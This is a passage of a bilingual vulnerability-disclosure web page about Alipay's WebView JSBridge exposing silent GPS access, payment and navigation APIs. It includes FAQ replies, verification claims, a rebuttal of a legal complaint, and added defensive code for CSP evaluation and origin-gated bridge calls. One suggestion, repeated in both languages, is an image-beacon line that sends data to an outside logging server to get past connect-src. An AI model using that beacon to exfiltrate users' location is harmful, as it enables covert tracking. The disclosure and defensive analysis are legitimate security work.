<li><strong>Solution</strong>: use an image beacon (<code>new Image().src = "https://server/log?data=..."</code>), which is a simple request and is not governed by <code>connect-src</code></li>
<li><strong>Alipay version differences</strong>: JSBridge authorization policies may differ between versions; test with the latest version</li>
</ul>
<p style="color:#9898a8;font-size:13px;"><em>Technical correction: thanks to <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5#issuecomment-4060****30" target="_blank">meooxx</a> for pointing out that CORS is a browser-side policy: it stops the browser from reading the response, not the request from reaching the server. For a simple request, the server always receives the request.</em></p>
<p><strong>Key fact:</strong> our iPhone 16 Pro (iOS 18.3) test <strong>did successfully</strong> obtain GPS data (recorded in the server logs), and in the test on Ant Group's security lead's iPhone in Hangzhou we likewise captured the coordinates. iOS reproduction requires specific server configuration conditions; it is not that the vulnerability does not exist.</p>
<p>We will provide a detailed iOS reproduction troubleshooting guide in <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5" target="_blank">Issue #5</a>.</p>
</div>
<div class="en">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #5 (freshnn)</p>
<p>freshnn reported that iOS can invoke and open the relevant pages, but the server receives no data; Android "silent GPS" was successfully reproduced.</p>
<p><strong>Possible causes:</strong></p>
<ul>
<li><strong>HTTPS mixed content blocking</strong> — If the PoC page loads in Alipay's HTTPS WebView but the exfiltration target is HTTP, WKWebView will block the request entirely (this blocks the request itself, not just the response)</li>
<li><strong>CSP connect-src restriction</strong> — Alipay's WebView may set CSP <code>connect-src</code> directives that block requests to external domains</li>
<li><strong>Solution</strong> — Use Image beacon (<code>new Image().src = "https://server/log?data=..."</code>) which is a simple request not restricted by <code>connect-src</code></li>
<li><strong>Alipay version differences</strong> — Different versions may have different JSBridge authentication policies; test with the latest version</li>
</ul>
<p style="color:#9898a8;font-size:13px;"><em>Technical correction: Thanks to <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5#issuecomment-4060****30" target="_blank">meooxx</a> for pointing out that CORS is a browser-side policy — it blocks the browser from reading the response, not the request from reaching the server. For simple requests, the server always receives the request.</em></p>
<p><strong>Key fact:</strong> Our iPhone 16 Pro (iOS 18.3) test <strong>did successfully</strong> obtain GPS data (recorded in server logs), and coordinates from the iPhone of Ant Group's security lead in Hangzhou were also successfully captured. iOS reproduction requires a specific server configuration: the vulnerability exists, but the PoC setup matters.</p>
<p>We will provide a detailed iOS reproduction troubleshooting guide in <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5" target="_blank">Issue #5</a>.</p>
</div>
</div>
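<p>The CSP bullet in Q4 above rests on a detail that defenders configuring a WebView's policy often miss: <code>connect-src</code> governs fetch/XHR/sendBeacon, an image load is governed by <code>img-src</code>, and a missing fetch directive falls back to <code>default-src</code>, so a policy that sets only <code>connect-src</code> does not restrict image requests at all. The block below is an added example, not code from this page or from any vendor: a minimal CSP evaluator that parses a policy header and reports which request types it blocks for a given destination. The two sample policies, <code>PAGE_ORIGIN</code> and the destination hosts are constructed for illustration; ports and paths in host sources are ignored for brevity.</p>

```javascript
// Added example (not code from the page or from any vendor): a minimal CSP
// evaluator showing which request types a policy actually restricts.
// connect-src governs fetch/XHR/sendBeacon, img-src governs image loads, and
// an absent fetch directive falls back to default-src, so a policy that sets
// only connect-src leaves image requests unrestricted.
// Sample policies and hosts below are constructed for illustration.

// Request type -> the CSP Level 3 fetch directive that governs it.
const DIRECTIVE_FOR = {
  fetch: 'connect-src',   // fetch(), XMLHttpRequest, navigator.sendBeacon(), WebSocket
  image: 'img-src',       // img elements and CSS images
  script: 'script-src',   // script elements
};

function parsePolicy(header) {
  // "connect-src 'self' https://a.example; img-src *"
  //   -> { 'connect-src': ["'self'", 'https://a.example'], 'img-src': ['*'] }
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

function sourceMatches(source, url, pageOrigin) {
  // Supports 'none', '*', 'self', scheme-source ("https:") and host-source
  // with an optional "*." wildcard. Ports and paths are ignored for brevity.
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === '*') return ['http:', 'https:', 'ws:', 'wss:'].includes(url.protocol);
  if (s === "'self'") return url.origin === pageOrigin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(?:\d+|\*))?(?:\/.*)?$/.exec(s);
  if (m === null) return false;               // keyword sources such as 'unsafe-inline'
  const scheme = m[1], wildcard = m[2], host = m[3];
  if (scheme !== undefined && url.protocol !== scheme + ':') return false;
  // "*.cdn.example" matches subdomains only, never the apex host itself.
  return wildcard ? url.hostname.endsWith('.' + host) : url.hostname === host;
}

function isRequestAllowed(header, requestType, requestUrl, pageOrigin) {
  const policy = parsePolicy(header);
  const directive = DIRECTIVE_FOR[requestType];
  // Fallback chain: the specific fetch directive, then default-src; if neither
  // is present the request type is unrestricted.
  const sources = policy[directive] !== undefined ? policy[directive] : policy['default-src'];
  if (sources === undefined) return true;
  const url = new URL(requestUrl);
  return sources.some((src) => sourceMatches(src, url, pageOrigin));
}

function blockedRequestTypes(header, requestUrl, pageOrigin) {
  // Which of the modelled request types would this policy block for requestUrl?
  return Object.keys(DIRECTIVE_FOR).filter(
    (type) => !isRequestAllowed(header, type, requestUrl, pageOrigin)
  );
}

// Constructed sample policies for a page served from PAGE_ORIGIN.
const PAGE_ORIGIN = 'https://ds.alipay.com';
const WEAK_POLICY = "connect-src 'self'";                                            // only fetch/XHR covered
const STRONG_POLICY = "default-src 'self'; img-src 'self' https://*.cdn.example";  // every fetch directive covered
```

<p>For a WebView meant to confine third-party content, the practical check is <code>blockedRequestTypes(policy, destination, pageOrigin)</code> for a destination outside the allowlist: any request type missing from the result is one the policy leaves open. Setting <code>default-src</code> closes the gap for every fetch directive not named explicitly, which is why the constructed weak policy stops only fetch/XHR while the strong one stops image and script loads too.</p>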
<!-- Q5: Alipay WebView vs standard browser -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">Q5: "This is a general browser design issue, not something specific to Alipay"</span>
<span class="en">Q5: "This is a general browser design issue, not specific to Alipay"</span>
</h3>
<div class="zh">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: V2EX (Puteulanus)</p>
<p><strong>Alipay WebView ≠ standard browser.</strong> Key differences:</p>
<table style="margin:12px 0;">
<tr><th>Capability</th><th>Standard browser</th><th>Alipay WebView (Nebula)</th></tr>
<tr><td>Location request</td><td style="color:#4ecdc4;">Confirmation dialog</td><td style="color:#ff4444;">Silent access</td></tr>
<tr><td>Payment API</td><td style="color:#4ecdc4;">None</td><td style="color:#ff4444;">tradePay callable</td></tr>
<tr><td>Internal page navigation</td><td style="color:#4ecdc4;">None</td><td style="color:#ff4444;">startApp can navigate to sensitive pages</td></tr>
<tr><td>Device fingerprint</td><td>Standard User-Agent</td><td style="color:#ff4444;">IMEI/brand/model/carrier</td></tr>
<tr><td>UI control</td><td style="color:#4ecdc4;">Limited</td><td style="color:#ff4444;">setTitle/showToast spoofable</td></tr>
</table>
<p>The very existence of the whitelist proves that Alipay <strong>itself believes</strong> it must restrict which pages may access these privileged APIs. Bypassing the whitelist = bypassing <strong>the security boundary Alipay set for itself</strong>.</p>
</div>
<div class="en">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: V2EX (Puteulanus)</p>
<p><strong>Alipay WebView ≠ standard browser.</strong> Key differences:</p>
<table style="margin:12px 0;">
<tr><th>Capability</th><th>Standard Browser</th><th>Alipay WebView (Nebula)</th></tr>
<tr><td>Location request</td><td style="color:#4ecdc4;">Confirmation dialog</td><td style="color:#ff4444;">Silent access</td></tr>
<tr><td>Payment API</td><td style="color:#4ecdc4;">None</td><td style="color:#ff4444;">tradePay callable</td></tr>
<tr><td>Internal navigation</td><td style="color:#4ecdc4;">None</td><td style="color:#ff4444;">startApp navigates to sensitive pages</td></tr>
<tr><td>Device fingerprint</td><td>Standard User-Agent</td><td style="color:#ff4444;">IMEI/Brand/Model/Carrier</td></tr>
<tr><td>UI control</td><td style="color:#4ecdc4;">Limited</td><td style="color:#ff4444;">setTitle/showToast spoofable</td></tr>
</table>
<p>The very existence of the whitelist proves that Alipay <strong>itself recognizes</strong> the need to restrict which pages can access these privileged APIs. Bypassing the whitelist = bypassing <strong>Alipay's own security boundary</strong>.</p>
</div>
</div>
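<p>Q2 and Q5 both turn on one design decision: a JSBridge must decide, per calling page, which privileged handlers it exposes and which need a fresh user decision, rather than letting every page loaded into the WebView inherit the host app's stored permissions. The block below is an added example, not code from this page and not Alipay's Nebula bridge, of such an origin-gated dispatcher. The handler names (<code>getLocation</code>, <code>tradePay</code>, <code>startApp</code>, <code>setTitle</code>, <code>showToast</code>) are the ones discussed on this page; <code>TRUSTED_ORIGINS</code>, the policy table and the <code>askUser</code> callback are assumptions for illustration.</p>

```javascript
// Added example (not the page's code and not Alipay's Nebula bridge): a JSBridge
// dispatcher that gates each handler on the calling page's origin and, for
// sensitive handlers, on a fresh native consent decision. Handler names are
// those discussed on the page; TRUSTED_ORIGINS, the policy table and the
// askUser callback are illustrative assumptions.

const TRUSTED_ORIGINS = new Set(['https://ds.alipay.com']);  // assumed first-party allowlist

// origins: 'trusted' = only allowlisted first-party pages may call;
//          'any'     = any page may call, as in a browser.
// consent: true = a native dialog must approve this call, every time.
const BRIDGE_POLICY = {
  getLocation: { origins: 'any',     consent: true  }, // browser model: anyone may ask, the user decides
  tradePay:    { origins: 'trusted', consent: true  }, // money movement: first-party and confirmed
  startApp:    { origins: 'trusted', consent: false }, // internal navigation: first-party only
  setTitle:    { origins: 'trusted', consent: false }, // UI chrome: first-party only
  showToast:   { origins: 'trusted', consent: false },
};

// Pure decision function so the policy can be unit-tested without a WebView.
// pageOrigin must come from the WebView's own knowledge of the loaded document,
// never from a value the page sends over the bridge.
// consent: true/false = result of a native dialog, null = no dialog was shown.
function decide(handler, pageOrigin, consent) {
  const policy = BRIDGE_POLICY[handler];
  if (policy === undefined) return { allow: false, reason: 'unknown-handler' };
  // Gate 1: origin. Untrusted pages never reach first-party-only handlers,
  // so they cannot even cause a dialog for them to appear.
  if (policy.origins === 'trusted' && !TRUSTED_ORIGINS.has(pageOrigin)) {
    return { allow: false, reason: 'untrusted-origin' };
  }
  // Gate 2: consent. The app holding an OS-level location permission is not
  // the same as the user approving this particular page's request now.
  if (policy.consent) {
    if (consent === null) return { allow: false, reason: 'consent-required' };
    if (consent !== true) return { allow: false, reason: 'consent-denied' };
  }
  return { allow: true, reason: 'ok' };
}

// Dispatcher as the native side would wire it. askUser(handler, origin) shows a
// native dialog the page cannot draw, restyle or dismiss, and returns true/false.
function dispatch(call, pageOrigin, askUser) {
  let decision = decide(call.handler, pageOrigin, null);
  if (decision.reason === 'consent-required') {
    decision = decide(call.handler, pageOrigin, askUser(call.handler, pageOrigin) === true);
  }
  return Object.assign({ handler: call.handler, origin: pageOrigin }, decision);
}
```

<p>The two gates are ordered deliberately: the origin check runs first, so an untrusted page cannot even make a payment dialog appear, while location follows the browser model from the tables above (any page may ask, a native dialog decides each time, and the page's own <code>setTitle</code>/<code>showToast</code> access cannot alter that dialog).</p>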
<!-- Q6: Independent verification and endorsements -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">Independent Verification &amp; Institutional Recognition</span>
<span class="en">Independent Verification & Institutional Recognition</span>
</h3>
<div class="zh">
<p>The validity of this research has been verified by multiple independent third parties:</p>
<ul>
<li><strong>Packet Storm Security</strong>: reviewed and published <a href="https://packetstormsecurity.com/files/217089" target="_blank">Advisory #217089</a></li>
<li><strong>MITRE</strong>: accepted 36 CVE requests (11 tickets)</li>
<li><strong>Apple Product Security</strong>: proactively opened an investigation (Case OE0105****3014)</li>
<li><strong>Google Play</strong>: opened a policy-violation investigation (Case 9-7515****0640)</li>
<li><strong>CSSF Luxembourg</strong>: 4 departments confirmed receipt; ICT Risk Supervision explicitly recorded it</li>
<li><strong>PDPC Singapore</strong>: opened a formal data protection investigation (#006****24)</li>
<li><strong>CIRCL Luxembourg CERT</strong>: an incident handler proactively contacted Alibaba SRC on our behalf</li>
<li><strong>HKMA Hong Kong Monetary Authority</strong>: case opened for investigation (Case CE2026****5412)</li>
<li><strong>cxxsheng</strong> (GitHub security researcher): confirmed the vulnerability exists after independently writing a PoC</li>
<li><strong>freshnn</strong> (GitHub user): independently confirmed that silent GPS reproduces successfully on Android</li>
</ul>
</div>
<div class="en">
<p>The validity of this research has been verified by multiple independent third parties:</p>
<ul>
<li><strong>Packet Storm Security</strong> — Reviewed and published <a href="https://packetstormsecurity.com/files/217089" target="_blank">Advisory #217089</a></li>
<li><strong>MITRE</strong> — 36 CVE submissions across 11 tickets acknowledged</li>
<li><strong>Apple Product Security</strong> — Proactively launched investigation (Case OE0105****3014)</li>
<li><strong>Google Play</strong> — Policy violation investigation (Case 9-7515****0640)</li>
<li><strong>CSSF Luxembourg</strong> — 4 departments confirmed receipt, ICT Risk Supervision explicitly noted</li>
<li><strong>PDPC Singapore</strong> — Formal data protection investigation (#006****24)</li>
<li><strong>CIRCL Luxembourg CERT</strong> — Incident handler proactively contacted Alibaba SRC on our behalf</li>
<li><strong>HKMA Hong Kong</strong> — Case filed (CE2026****5412)</li>
<li><strong>cxxsheng</strong> (GitHub researcher) — Independently wrote PoC and confirmed vulnerability exists</li>
<li><strong>freshnn</strong> (GitHub user) — Independently confirmed silent GPS reproduction on Android</li>
</ul>
</div>
</div>
</section>
<!-- ==================== LEGAL RESPONSE ==================== -->
<section id="legal-response">
<h2><span class="num">⚖️</span>
<span class="zh">Legal Complaint Response</span>
<span class="en">Legal Complaint Response</span>
</h2>
<div class="zh">
<div class="callout" style="border-left:4px solid var(--accent);background:rgba(255,68,68,.08);padding:20px;border-radius:0 8px 8px 0;margin-bottom:24px;">
<p style="margin-bottom:12px;"><strong>Complaint #:</strong> [redacted]</p>
<p style="margin-bottom:12px;"><strong>Filed:</strong> 2026-03-11 22:45:59 (only 4 hours 29 minutes after the article was published)</p>
<p style="margin-bottom:12px;"><strong>Complainant:</strong> Beijing Geyun Law Firm (License No. 31110000MD0196493T)</p>
<p style="margin-bottom:12px;"><strong>Category:</strong> content infringing reputation/goodwill/privacy/likeness</p>
<p style="margin-bottom:0;"><strong>Platform:</strong> WeChat Official Account Platform</p>
</div>
<h3>Our Position: The Complaint Has No Merit</h3>
<p><strong>1. The article names no company</strong>: the article we published on our WeChat Official Account contains zero occurrences of "支付宝", "Alipay", "Ant Group" or any name identifying a specific company. Under Article 1024 of the PRC Civil Code, infringement of reputation or goodwill requires that the content "target a specific subject". By filing the complaint, the complainant has itself confirmed the connection between the article and its client.</p>
<p><strong>2. The content is factual and backed by a complete chain of evidence</strong>: under Article 1025 of the PRC Civil Code, a person who affects another's reputation while exercising public-interest supervision bears no civil liability, provided the content is truthful and does not exceed reasonable limits. Our article is based on 308 server log entries, tests on 3 real devices and 42 screenshots. Every conclusion can be independently reproduced and verified.</p>
<p><strong>3. The vendor's security team verified the vulnerability themselves</strong>: during the private reporting phase, the vendor's security team assigned a business lead to verify our findings together with us. When that person tested on their own iPhone 16 Pro in Hangzhou, the GPS coordinates were sent straight back to our server, <strong>with no GPS authorization prompt at any point</strong>. This directly refutes the complainant's claim that "every use of location permission notifies the user with a dialog". The verification also showed that the iOS attack surface is significantly larger than Android's, additionally exposing 5 sensitive APIs including tradePay (payment SDK) and share (worm propagation).</p>
<p><strong>4. The vendor's own classification removes any basis for infringement</strong>: after verifying the above facts in person, the vendor's security team still replied on 2026-03-10 that "these are normal features". Discussing an app's "normal features" logically cannot constitute "goodwill infringement". When a company knows a risk exists, chooses not to fix it, and then uses legal means to keep the public from knowing, that is not rights protection; it is concealment.</p>
<p><strong>5. Consumers' right to know</strong>: Article 8 of the Consumer Rights Protection Law provides that consumers have the right to know the true conditions of the goods they buy or use and the services they receive. When a payment tool with 1B+ users has feature designs that external links can exploit, security research and public discussion are a legitimate exercise of public supervision.</p>
<p><strong>6. The responsible disclosure process was fully compliant</strong>: before going public we made 4 rounds of private reports (2026-02-25 to 2026-03-07) and waited for the vendor's response until it explicitly replied "normal features". Measured against ISO/IEC 29147:2018 and Google Project Zero's 90-day standard, our process is fully compliant.</p>
<p>We have submitted complete appeal materials to the WeChat Official Account Platform. If the complainant disputes the technical facts, we welcome verification by a third-party technical assessment body.</p>
<p style="font-size:14px;color:var(--text2);margin-top:20px;"><strong>Full rebuttal article:</strong> <a href="https://innora.ai/zfb/rebuttal.html">Alipay Security Research Hit by a Lawyer's Complaint: How Can an Article That Never Mentions "Alipay" Constitute "Goodwill Infringement"?</a></p>
</div>
<div class="en">
<div class="callout" style="border-left:4px solid var(--accent);background:rgba(255,68,68,.08);padding:20px;border-radius:0 8px 8px 0;margin-bottom:24px;">
<p style="margin-bottom:12px;"><strong>Complaint #:</strong> [redacted]</p>
<p style="margin-bottom:12px;"><strong>Filed:</strong> 2026-03-11 22:45:59 (only 4 hours 29 minutes after article publication)</p>
<p style="margin-bottom:12px;"><strong>Complainant:</strong> Beijing Geyun Law Firm (License: 31110000MD0196493T)</p>
<p style="margin-bottom:12px;"><strong>Category:</strong> Content infringing reputation/goodwill/privacy/likeness</p>
<p style="margin-bottom:0;"><strong>Platform:</strong> WeChat Official Account Platform</p>
</div>
<h3>Our Position: The Complaint Has No Merit</h3>
<p><strong>1. The article names no company</strong> — Our WeChat article contains zero mentions of "Alipay," "支付宝," "Ant Group," or any identifiable corporate name. Under PRC Civil Code Article 1024, reputation infringement requires targeting a "specific subject." By filing this complaint, the complainant effectively self-identified their client as the article's subject.</p>
<p><strong>2. All content is factual and evidence-backed</strong> — Under PRC Civil Code Article 1025, one shall not bear civil liability for supervising public interest when the content is truthful and does not exceed reasonable limits. Our article is based on 308 server logs, testing across 3 real devices, and 42 screenshots. All findings are independently reproducible.</p>
<p><strong>3. The vendor's own security team verified the vulnerability</strong> — During the private reporting phase, the vendor assigned a security business lead to coordinate and verify our findings. When this person tested on their own iPhone 16 Pro in Hangzhou, GPS coordinates were transmitted directly to our server with <strong>no authorization prompt whatsoever</strong>. This directly contradicts the complainant's claim that "location access always prompts the user." This verification also revealed that the iOS attack surface is significantly larger than Android — exposing 5 additional sensitive APIs including tradePay (payment SDK) and share (worm propagation vector).</p>
<p><strong>4. The vendor's own classification eliminates infringement</strong> — After personally verifying all the above facts, the vendor's security team still responded on 2026-03-10: "These are normal features." Discussing an app's "normal features" cannot logically constitute "reputation infringement." When a company knowingly ignores verified risks and then uses legal means to suppress public awareness — that is not rights protection, it is concealment.</p>
<p><strong>5. Consumer right to know</strong> — PRC Consumer Rights Protection Law Article 8 guarantees consumers the right to know the true conditions of products and services they use. When a payment tool used by 1B+ users has features exploitable via external links, security research and public discussion serve the legitimate public interest.</p>
<p><strong>6. Responsible disclosure fully compliant</strong> — We submitted 4 rounds of private reports (2026-02-25 to 2026-03-07) before public disclosure. We waited for the vendor's explicit response ("normal features"). Per ISO/IEC 29147:2018 and Google Project Zero's 90-day standard, our process is fully compliant.</p>
<p>We have submitted complete appeal materials to the WeChat platform. If the complainant disputes the technical facts, we welcome verification through an independent third-party technical assessment.</p>
<p style="font-size:14px;color:var(--text2);margin-top:20px;"><strong>Full rebuttal article:</strong> <a href="https://innora.ai/zfb/rebuttal.html">How Can an Article That Never Mentions "Alipay" Constitute "Reputation Infringement"?</a></p>
</div>
</section>
<!-- ==================== DISCLAIMER ==================== -->
<section>
<h2>
<span class="zh">Legal Notice &amp; Disclaimer</span>
<span class="en">Legal Notice & Disclaimer</span>
</h2>
<div class="callout info">
<div class="zh">
<h3 style="margin-top:0;">Research Nature Statement</h3>
<ul>
<li>This research was conducted solely for security research and educational purposes, consistent with the freedom of scientific research provided for in Article 47 of the Constitution.</li>
<li>All tests were performed on the researchers' own devices and accounts; no third-party system was harmed.</li>
<li>The research team is an independent security research organization that runs no payment business and has no commercial interest in any competing company.</li>
</ul>
<h3>Responsible Disclosure Compliance Statement</h3>
<ul>
<li>Before public release, all findings and remediation suggestions were submitted to the vendor through 4 rounds of private reports (2026-02-25 to 2026-03-07).</li>
<li>On 2026-03-10 the vendor formally replied "normal functionality", explicitly declining to fix.</li>
<li>The researchers published their results only after the vendor had explicitly closed the dialogue, in line with the ISO/IEC 29147:2018 responsible disclosure standard.</li>
<li>Everything published consists of technical facts already known to the vendor and does not constitute "unauthorized publication of cybersecurity information" (Cybersecurity Law, Article 26).</li>
</ul>
<h3>Legal Basis</h3>
<ul>
<li><strong>PRC Civil Code, Article 1025</strong>: no civil liability for public-interest supervision when the content is truthful and does not exceed reasonable limits.</li>
<li><strong>Consumer Rights Protection Law, Article 8</strong>: consumers have the right to know the true conditions of the services they use.</li>
<li><strong>PRC Civil Code, Article 1024</strong>: reputation infringement must target a specific subject; this article names no company.</li>
<li><strong>CVSS 3.1</strong>: the internationally used vulnerability scoring system explicitly treats "user interaction required" security issues as valid security findings.</li>
</ul>
<h3>Content Safety Statement</h3>
<ul>
<li>This article contains no complete PoC code that could be used directly for attacks (critical parameters have been sanitized).</li>
<li>The online demonstration pages are read-only and have all data exfiltration functionality disabled.</li>
<li>We have honestly labeled the verification status of every finding, including the parts where defenses are effective.</li>
<li>Every description involving financial operations explicitly notes "manual user confirmation still required".</li>
</ul>
</div>
<div class="en">
<h3 style="margin-top:0;">Research Nature Statement</h3>
<ul>
<li>This research was conducted solely for security research and educational purposes, in accordance with the freedom of scientific research guaranteed by Article 47 of the PRC Constitution.</li>
<li>All testing was performed on the researcher's own devices and accounts. No third-party systems were harmed.</li>
<li>The research team is an independent security research institution with no payment business and no commercial interest with any competing enterprise.</li>
</ul>
<h3>Responsible Disclosure Compliance</h3>
<ul>
<li>All findings and remediation suggestions were submitted to the vendor through 4 rounds of private reports (2026-02-25 to 2026-03-07) before any public disclosure.</li>
<li>The vendor officially responded on 2026-03-10 with "normal functionality," explicitly declining to remediate.</li>
<li>Public disclosure occurred only after the vendor explicitly closed the dialogue, in compliance with ISO/IEC 29147:2018 responsible disclosure standards.</li>
<li>Published content covers only technical facts already known to the vendor and does not constitute "unauthorized publication of cybersecurity information" (Cybersecurity Law Article 26).</li>
</ul>
<h3>Legal Basis</h3>
<ul>
<li><strong>PRC Civil Code Article 1025</strong>: One shall not bear civil liability for supervising public interest when content is truthful and does not exceed reasonable limits.</li>
<li><strong>Consumer Rights Protection Law Article 8</strong>: Consumers have the right to know the true conditions of services they use.</li>
<li><strong>PRC Civil Code Article 1024</strong>: Reputation infringement requires targeting a specific subject — this article names no company.</li>
<li><strong>CVSS 3.1</strong>: The international vulnerability scoring system explicitly recognizes "user interaction required" findings as valid security issues.</li>
</ul>
<h3>Content Safety Statement</h3>
<ul>
<li>This article does not contain any complete PoC code that could be directly used for attacks (critical parameters are sanitized).</li>
<li>Online demonstration pages are read-only with all data exfiltration functionality disabled.</li>
<li>We honestly labeled the verification status of each finding, including parts where defenses are effective.</li>
<li>All descriptions involving financial operations explicitly note "user manual confirmation still required."</li>
</ul>
</div>
</div>
</section>
</div>
<!-- ==================== CONTACT ==================== -->
<section>
<h2>
<span class="zh">Contact Us</span>
<span class="en">Contact</span>
</h2>
<div class="zh">
<p>If Ant Group, after reading this article, wishes to discuss further, request clarification or ask for specific content to be updated, please email <strong>feng@innora.ai</strong>. If the issues are fixed in a later version, we will promptly update this article and mark the fix status.</p>
<p>Other security researchers who have questions about the technical analysis in this article or want to exchange ideas are equally welcome to get in touch.</p>
</div>
<div class="en">
<p>If Ant Group wishes to discuss further, request clarification, or ask for specific content updates after reading this article, please email <strong>feng@innora.ai</strong>. If the issues discussed here are addressed in future versions, we will promptly update this article with the fix status.</p>
<p>Other security researchers with questions about the technical analysis or who wish to exchange findings are also welcome to reach out.</p>
</div>
</section>
<!-- ==================== FOOTER ==================== -->
<footer>
<p>&copy; 2026 Innora AI Security Research. All rights reserved.</p>
<p>feng@innora.ai | <a href="https://innora.ai">innora.ai</a></p>
<p style="margin-top: 12px; font-size: 11px; color: #555;">
<span class="zh">This article was published on 2026-03-11. If Ant Group fixes the above issues after that date, we will update this article to say so.</span>
<span class="en">Published 2026-03-11. Last updated: 2026-03-14. If Ant Group addresses the above issues after this date, we will update this article accordingly.</span>
</p>
</footer>
<script>
function setLang(lang) {
document.body.className = lang === 'zh' ? 'lang-zh' : '';
document.getElementById('btn-zh').className = lang === 'zh' ? 'active' : '';
document.getElementById('btn-en').className = lang === 'en' ? 'active' : '';
localStorage.setItem('zfb-lang', lang);
}
// Restore language preference
var saved = localStorage.getItem('zfb-lang');
if (saved === 'zh') setLang('zh');
</script>
</body>
</html>